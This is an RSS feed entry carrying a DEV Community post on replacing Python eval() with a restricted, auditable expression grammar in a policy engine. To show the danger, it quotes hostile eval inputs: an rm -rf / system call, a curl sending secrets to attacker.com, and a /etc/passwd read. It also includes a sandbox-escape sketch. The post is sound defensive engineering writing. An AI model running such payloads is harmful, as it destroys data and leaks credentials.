<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Aisha</title>
    <description>The latest articles on DEV Community by Aisha (@aisha_ow).</description>
    <link>https://dev.to/aisha_ow</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3949967%2Fbf0520a6-2209-41cd-b79d-58bd28f1ecf7.png</url>
      <title>DEV Community: Aisha</title>
      <link>https://dev.to/aisha_ow</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/aisha_ow"/>
    <language>en</language>
    <item>
      <title>Why I Didn't Use eval() in ObsidianWall's Policy Engine — And What I Built Instead</title>
      <dc:creator>Aisha</dc:creator>
      <pubDate>Mon, 25 May 2026 13:00:00 +0000</pubDate>
      <link>https://dev.to/aisha_ow/why-i-didnt-use-eval-in-obsidianwalls-policy-engine-and-what-i-built-instead-31kb</link>
      <guid>https://dev.to/aisha_ow/why-i-didnt-use-eval-in-obsidianwalls-policy-engine-and-what-i-built-instead-31kb</guid>
      <description>&lt;p&gt;&lt;em&gt;Published by Aisha · ObsidianWall&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;When you're building a tool that evaluates policy expressions like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;current_spend&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;estimated_cost&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;budget&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;amount&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;the obvious implementation is a single line of Python:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;expression&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It works. It's clean. It takes five minutes to write.&lt;/p&gt;

&lt;p&gt;I didn't use it. Here's exactly why — and what I built instead.&lt;/p&gt;




&lt;h2&gt;
  
  
  What ObsidianWall Is
&lt;/h2&gt;

&lt;p&gt;Before getting into the technical decision, some context.&lt;/p&gt;

&lt;p&gt;ObsidianWall is a &lt;strong&gt;programmable assurance platform&lt;/strong&gt; — a system for encoding human governance intent as executable policy, evaluating it deterministically, and enforcing it transparently with full audit traceability.&lt;/p&gt;

&lt;p&gt;The core doctrine of the platform is this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;AI may advise. AI may explain. AI may optimize. AI may recommend.&lt;/em&gt;&lt;br&gt;
&lt;em&gt;AI may NOT authoritatively govern.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That single principle drives every architectural decision in the platform, including the one this article is about.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ObsidianWall Verdict&lt;/strong&gt; is the first executable built on that platform — a deterministic pre-deployment infrastructure governance engine. It evaluates infrastructure plans against policy before deployment happens, produces an enforcement decision, and generates an audit-grade trace of exactly how that decision was reached.&lt;/p&gt;

&lt;p&gt;The expression evaluator is at the heart of how Verdict makes those decisions. And that is where &lt;code&gt;eval()&lt;/code&gt; became the wrong answer.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Problem With eval() in a Governance Engine
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;eval()&lt;/code&gt; executes arbitrary Python expressions. That sentence sounds harmless until you think carefully about what "arbitrary" means in the context of a system that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Accepts policy files written by humans&lt;/li&gt;
&lt;li&gt;Processes infrastructure plans from CI/CD pipelines&lt;/li&gt;
&lt;li&gt;Makes enforcement decisions that block or allow deployments&lt;/li&gt;
&lt;li&gt;Produces audit records that compliance teams rely on&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In that context, "arbitrary" means each of the following is a valid input to your evaluator:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Someone writes this as a policy condition expression:
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__import__(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;os&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;).system(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;rm -rf /&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# Or this:
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__import__(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;subprocess&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;).call([&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;curl&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;, &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;http://attacker.com&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;, &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;-d&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;, secrets])&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# Or something subtler:
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;open(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/etc/passwd&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;).read() == &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;root&lt;/span&gt;&lt;span class="sh"&gt;'"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;eval()&lt;/code&gt; executes all of them without question.&lt;/p&gt;

&lt;p&gt;The standard advice is to sandbox it by removing builtins:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;expression&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__builtins__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{}},&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is not sufficient. Python's object model provides paths back to dangerous capabilities through class hierarchies even with builtins removed. Sandboxes built on a restricted &lt;code&gt;eval()&lt;/code&gt; have a long public record of being bypassed. Treat this as a fundamentally unsolved problem, not an engineering challenge you can outthink with a clever enough sandbox.&lt;/p&gt;
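
&lt;p&gt;A harmless illustration of that path, as a minimal sketch: with builtins removed, plain attribute access on a tuple literal still reaches &lt;code&gt;object&lt;/code&gt; and every class that directly derives from it. The variable names are illustrative and nothing dangerous is invoked; the point is only that an empty &lt;code&gt;__builtins__&lt;/code&gt; dict does not close the door.&lt;/p&gt;

```python
# "Sandboxed" globals: no builtins are available to the expression.
sandbox_globals = {"__builtins__": {}}

# Only attribute access and a method call on a literal; no names are looked up.
expression = "().__class__.__base__.__subclasses__()"

# Walks from tuple to object, then lists the classes that directly subclass object.
reachable = eval(expression, sandbox_globals, {})
names = [cls.__name__ for cls in reachable]

print(len(names), "classes reachable without builtins")
```

&lt;p&gt;From a list like this, an attacker searches for a class whose methods lead back to file or process access. Which classes appear depends on the interpreter version and on what has been imported, which is part of why blocklists tend not to hold.&lt;/p&gt;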

&lt;p&gt;But the security problem is not even the most important reason to reject &lt;code&gt;eval()&lt;/code&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Real Problem: Auditability
&lt;/h2&gt;

&lt;p&gt;A governance engine is not a calculator. It is a system that makes enforcement decisions about infrastructure and produces audit records that humans, compliance teams, and regulators rely on.&lt;/p&gt;

&lt;p&gt;For that system to be trustworthy, every decision must be:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Deterministic&lt;/strong&gt; — the same input always produces the same output, without exception&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auditable&lt;/strong&gt; — a human reading the trace can verify the decision independently without running any code&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bounded&lt;/strong&gt; — the complete set of things the evaluator can do is finite, known, and describable&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;eval()&lt;/code&gt; fails all three requirements.&lt;/p&gt;

&lt;p&gt;It cannot guarantee determinism: an expression may perform I/O, read the clock, or mutate state, so identical inputs can yield different outputs. It is not auditable: you cannot fully describe its behavior surface without describing all of Python. It is unbounded: it can do anything Python can do.&lt;/p&gt;
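
&lt;p&gt;The determinism point is easy to reproduce. In this small sketch (the expression and the &lt;code&gt;calls&lt;/code&gt; key are made up for illustration), the same expression string is evaluated twice against the same context object and returns two different results, because the expression itself mutates the context.&lt;/p&gt;

```python
# The same expression string and the same context object, evaluated twice.
expression = "calls.append(1) or len(calls)"
context = {"calls": []}

first = eval(expression, {}, context)   # the expression mutates context["calls"]
second = eval(expression, {}, context)  # so the second run sees different state

print(first, second)  # prints: 1 2
```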

&lt;p&gt;What a governance engine actually needs is not a Python expression evaluator. It needs a &lt;strong&gt;restricted expression grammar&lt;/strong&gt; — a purposefully small language that can only do exactly what policy evaluation requires, and nothing else. The restriction is not a limitation. It is the entire point.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Solution: A Deterministic Expression Grammar
&lt;/h2&gt;

&lt;p&gt;ObsidianWall Verdict's condition evaluator supports a deliberately minimal grammar:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Comparison operators:   &amp;lt;=   &amp;gt;=   &amp;lt;   &amp;gt;   ==
Arithmetic operations:  addition  ( a + b )
Operand types:          context keys,  numeric literals
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That is the complete grammar. No function calls. No variable assignment. No imports. No string manipulation. No loops. No conditionals beyond the comparison itself.&lt;/p&gt;

&lt;p&gt;If an expression requires anything outside this grammar, the evaluator does not attempt to execute it. It raises an error with a clear message. The boundary is explicit, enforced, and fully testable.&lt;/p&gt;

&lt;p&gt;This means a policy author can write:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;conditions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;budget_check&lt;/span&gt;
    &lt;span class="na"&gt;expression&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(current_spend&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;+&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;estimated_cost)&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;lt;=&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;budget.amount"&lt;/span&gt;
    &lt;span class="na"&gt;description&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Monthly&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;spend&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;cap&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;enforcement"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And the evaluator resolves it step by step:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Strip cosmetic parentheses&lt;/li&gt;
&lt;li&gt;Identify the comparison operator — &lt;code&gt;&amp;lt;=&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Split into left side and right side&lt;/li&gt;
&lt;li&gt;Resolve left side — &lt;code&gt;current_spend + estimated_cost&lt;/code&gt; — by looking up each key in the runtime context and summing them&lt;/li&gt;
&lt;li&gt;Resolve right side — &lt;code&gt;budget.amount&lt;/code&gt; — by looking up the key in the runtime context&lt;/li&gt;
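&lt;li&gt;Apply the operator. With &lt;code&gt;current_spend = 0&lt;/code&gt;, &lt;code&gt;estimated_cost = 100&lt;/code&gt;, and &lt;code&gt;budget.amount = 50.0&lt;/code&gt;, that is &lt;code&gt;100 &amp;lt;= 50.0&lt;/code&gt;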
&lt;/li&gt;
&lt;li&gt;Return the result — &lt;code&gt;False&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Every step is traceable. Every step is verifiable. A compliance engineer reading the audit output can reconstruct the evaluation manually without running any code. That is what auditability means in practice — not just logging that a decision happened, but making the decision itself independently verifiable.&lt;/p&gt;
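
&lt;p&gt;The steps above can be sketched in a few dozen lines. This is not Verdict's implementation, which the article does not show: instead of splitting the string by hand, the sketch swaps in Python's standard &lt;code&gt;ast&lt;/code&gt; module to parse the expression (never execute it) and then accepts only a whitelist of node types. The function name mirrors the tests later in this article; the helper names, the optional &lt;code&gt;trace&lt;/code&gt; argument, and the shape of the trace entries are assumptions made for illustration.&lt;/p&gt;

```python
import ast
import operator

# Whitelisted comparison nodes mapped to plain functions (nothing is eval'd).
COMPARATORS = {
    ast.LtE: operator.le,
    ast.GtE: operator.ge,
    ast.Lt: operator.lt,
    ast.Gt: operator.gt,
    ast.Eq: operator.eq,
}


def _dotted_key(node):
    """Rebuild a flat context key such as 'budget.amount' from Name/Attribute nodes."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return _dotted_key(node.value) + "." + node.attr
    raise ValueError("unsupported operand: " + type(node).__name__)


def _operand(node, context, trace):
    """Resolve a numeric literal, a context key, or an addition of operands."""
    if isinstance(node, ast.Constant):
        # bool is a subclass of int, so it is excluded explicitly.
        if isinstance(node.value, bool) or not isinstance(node.value, (int, float)):
            raise ValueError("only numeric literals are allowed")
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        total = _operand(node.left, context, trace) + _operand(node.right, context, trace)
        trace.append({"step": "add", "value": total})
        return total
    key = _dotted_key(node)
    if key not in context:
        raise ValueError("unknown context key: " + key)
    trace.append({"step": "lookup", "key": key, "value": context[key]})
    return context[key]


def evaluate_expression(expression, context, trace=None):
    """Evaluate one comparison from the restricted grammar; reject anything else."""
    trace = [] if trace is None else trace
    try:
        tree = ast.parse(expression, mode="eval")
    except SyntaxError as exc:
        raise ValueError("not a valid expression") from exc
    body = tree.body
    if not isinstance(body, ast.Compare) or len(body.ops) != 1:
        raise ValueError("expected exactly one comparison")
    compare = COMPARATORS.get(type(body.ops[0]))
    if compare is None:
        raise ValueError("unsupported comparison operator")
    left = _operand(body.left, context, trace)
    right = _operand(body.comparators[0], context, trace)
    result = compare(left, right)
    trace.append({"step": "compare", "operator": type(body.ops[0]).__name__,
                  "left": left, "right": right, "result": result})
    return result
```

&lt;p&gt;Function calls, imports, string literals, and chained comparisons are rejected with &lt;code&gt;ValueError&lt;/code&gt; rather than executed. One trade-off to be aware of: leaning on Python's parser means the accepted syntax is defined by Python's grammar plus the whitelist, whereas a hand-written parser keeps the grammar fully self-described.&lt;/p&gt;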




&lt;h2&gt;
  
  
  The Normalization Layer — Bridging Human Intent and Machine Evaluation
&lt;/h2&gt;

&lt;p&gt;There is an architectural subtlety that took real design work to get right.&lt;/p&gt;

&lt;p&gt;Governance policies are written by humans in nested, readable structures:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;parameters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;budget&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;amount&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;50&lt;/span&gt;
      &lt;span class="na"&gt;period&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;monthly&lt;/span&gt;
      &lt;span class="na"&gt;owner&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;team-alpha&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But the deterministic evaluator operates against a flat key-value context. It resolves &lt;code&gt;budget.amount&lt;/code&gt; as one literal key in a single lookup: no nested object traversal, no dynamic attribute access, no recursive dict walking.&lt;/p&gt;

&lt;p&gt;The naive solution is to make the evaluator smart about nested structures. That is the wrong solution. It couples the evaluator to policy structure, enlarges the behavior surface that its determinism guarantees have to cover, and makes it significantly harder to audit.&lt;/p&gt;

&lt;p&gt;The correct solution is a &lt;strong&gt;normalization layer&lt;/strong&gt; that runs before evaluation — a dedicated component whose only job is to translate human-readable nested policy structures into evaluator-ready flat contexts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;Input:&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"budget"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"amount"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"period"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"monthly"&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;Output:&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"budget.amount"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"budget.period"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"monthly"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After normalization, the evaluator receives a flat context. It resolves &lt;code&gt;budget.amount&lt;/code&gt; directly. It never needs to know how the policy was structured. The normalization layer is the bridge — and it is the only place in the system that understands both the policy structure and the evaluation context simultaneously.&lt;/p&gt;
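
&lt;p&gt;A minimal sketch of that flattening step, assuming string keys and dot-joined paths as in the example above. The function name and the duplicate-key check are illustrative assumptions, not Verdict's actual code.&lt;/p&gt;

```python
def flatten(nested, prefix=""):
    """Flatten nested dicts into dotted keys, e.g. {'a': {'b': 1}} to {'a.b': 1}."""
    flat = {}
    for key, value in nested.items():
        dotted = prefix + "." + key if prefix else key
        if isinstance(value, dict):
            children = flatten(value, dotted)
        else:
            children = {dotted: value}
        for child_key, child_value in children.items():
            if child_key in flat:
                # Two source paths map to one flat key: refuse rather than guess.
                raise ValueError("duplicate flat key: " + child_key)
            flat[child_key] = child_value
    return flat


parameters = {"budget": {"amount": 50, "period": "monthly"}}
print(flatten(parameters))  # {'budget.amount': 50, 'budget.period': 'monthly'}
```

&lt;p&gt;Raising on a duplicate key, instead of letting the later value win, keeps the normalized context independent of key ordering in the source policy.&lt;/p&gt;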

&lt;p&gt;The evaluation pipeline becomes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Raw Policy YAML
      ↓
Canonicalize DSL structure
      ↓
Validate against schema contract
      ↓
Flatten + merge into runtime context     ← normalization layer
      ↓
Restricted expression evaluation         ← deterministic, bounded
      ↓
Decision + immutable audit trace
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each layer has one responsibility. Each layer can be tested independently. Each layer can be audited independently. No layer needs to understand what the others are doing internally.&lt;/p&gt;




&lt;h2&gt;
  
  
  What This Means for Testing
&lt;/h2&gt;

&lt;p&gt;Because the expression evaluator is a pure function with no side effects and a completely bounded input surface, testing it requires no mocking, no fixtures, and no infrastructure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
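&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;pytest&lt;/span&gt;

&lt;span class="c1"&gt;# evaluate_expression is the evaluator under test; import it from wherever it lives in your project.
&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_blocks_when_budget_exceeded&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;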
    &lt;span class="n"&gt;context&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;current_spend&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;estimated_cost&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;budget.amount&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="mf"&gt;50.0&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;evaluate_expression&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(current_spend + estimated_cost) &amp;lt;= budget.amount&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;context&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_allows_when_within_budget&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;context&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;current_spend&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;estimated_cost&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;30&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;budget.amount&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="mf"&gt;50.0&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;evaluate_expression&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(current_spend + estimated_cost) &amp;lt;= budget.amount&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;context&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_rejects_expression_outside_grammar&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;pytest&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;raises&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;ValueError&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="nf"&gt;evaluate_expression&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__import__(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;os&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;).system(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ls&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;{}&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An expression and a context go in. A result comes out. You assert the result. No setup. No teardown. No dependencies. That is what happens when you build a pure deterministic function instead of delegating to &lt;code&gt;eval()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The third test is particularly important for a governance engine. The evaluator does not just fail silently on unsupported expressions — it explicitly rejects them. The boundary is enforced, not just hoped for.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Principle Behind the Decision
&lt;/h2&gt;

&lt;p&gt;The decision not to use &lt;code&gt;eval()&lt;/code&gt; is not primarily a security decision, though security is one outcome.&lt;/p&gt;

&lt;p&gt;It is a decision about what kind of system ObsidianWall is.&lt;/p&gt;

&lt;p&gt;The ObsidianWall doctrine says AI may advise but may not authoritatively govern. The same principle applies to the expression evaluator — it may evaluate exactly what the grammar allows, and nothing else. The restriction is the guarantee. The boundary is the trust.&lt;/p&gt;

